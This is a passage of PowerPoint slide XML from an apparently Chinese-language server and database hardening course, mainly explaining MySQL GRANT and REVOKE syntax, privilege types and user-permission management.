        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4758760" y="2732637"/>
            <a:ext cx="575945" cy="53657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
        <p:nvSpPr>
          <p:cNvPr id="10" name="椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751218" y="4874567"/>
            <a:ext cx="575945" cy="52641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03</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6184264" y="4864407"/>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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6939285" y="1582426"/>
            <a:ext cx="4026005" cy="92016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操作系统加固</a:t>
            </a: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操作系统加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6939285" y="3269212"/>
            <a:ext cx="4237787" cy="154184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a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</a:t>
            </a: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a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</a:t>
            </a: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a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6833393" y="5414987"/>
            <a:ext cx="4237787" cy="154184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Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</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a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Mongodb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>加固</a:t>
            </a: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2998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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>grant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019174" y="1196340"/>
            <a:ext cx="10529697" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>mysql&gt; grant all privileges ON *.* TO 'test'@'localhost'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>    -&gt; identified by '123456' with grant option;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>GRANT命令说明：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALL PRIVILEGES</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> 是表示所有权限，你也可以使用select、update等权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> 用来指定权限针对哪些库和表。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*.* </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>中前面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>号用来指定数据库名，后面的*号用来指定表名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> 表示将权限赋予某个用户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@'localhost' </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>用户，@后面接限制的主机，可以是IP、IP段、域名以及%，%</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>表示任何地方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDENTIFIED BY</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> 指定用户的登录密码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WITH GRANT OPTION</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> 这个选项表示该用户可以将自己拥有的权限授权给别人。注意：经常有人在创建操作用户的时候不指定WITH GRANT OPTION选项导致后来该用户不能使用GRANT命令创建用户或者给其他用户授权。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>备注：可以使用GRANT重复给用户添加权限，权限叠加，比如你先给用户添加了一个select权限，然后又给用户添加了一个insert权限，那么该用户就同时拥有了select和insert权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基本操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888365" y="802005"/>
            <a:ext cx="10175240" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>查询、增加、取消用户权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>mysql&gt;show grants for test@localhost;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mysql&gt;grant select,insert,delete on *.* to test@localhost;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>mysql&gt; revoke delete ON *.* from test@localhost;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="996950" y="1428115"/>
            <a:ext cx="7457440" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="939800" y="3888740"/>
            <a:ext cx="9869805" cy="2465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用户权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1226820"/>
            <a:ext cx="10175240" cy="4483100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以为不用的用户分配严格的、复杂的权限、这些操作大多都可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>grant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（分配权限）和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>revoke(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>回收权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来实现。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改表和索引</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建数据库和表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DROP:		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抛弃（删除）数据库和表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>INDEX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建或抛弃索引</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向表中插入新行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检索表中的记录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UPDATE		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改现存表记录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读或写服务器上的文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PROCESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看服务器中执行的线程信息或杀死线程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RELOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重载授权表或清空日志。主机缓存或表缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SHUTDOWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所有权限，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALL PRIVILEGES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同义词</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>USAGE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特殊的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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3042920" y="2576195"/>
            <a:ext cx="5785485" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4000" b="1" i="0" kern="700" spc="-110" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw dist="38100" dir="5400000" algn="t" rotWithShape="0">
                    <a:schemeClr val="bg1">
                      <a:alpha val="84000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2BBB99"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2BBB99"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全加固</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="700" cap="none" spc="-110" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="2BBB99"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw dist="38100" dir="5400000" algn="t" rotWithShape="0">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="84000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3937000" y="3370580"/>
            <a:ext cx="1376680" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="358CC1"/>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2" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5313680" y="3370580"/>
            <a:ext cx="1374775" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2BBB9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3" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6688455" y="3370580"/>
            <a:ext cx="1376045" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C37B">
              <a:lumMod val="75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删除默认数据库和数据库用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080135" y="1226820"/>
            <a:ext cx="10175240" cy="3934460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
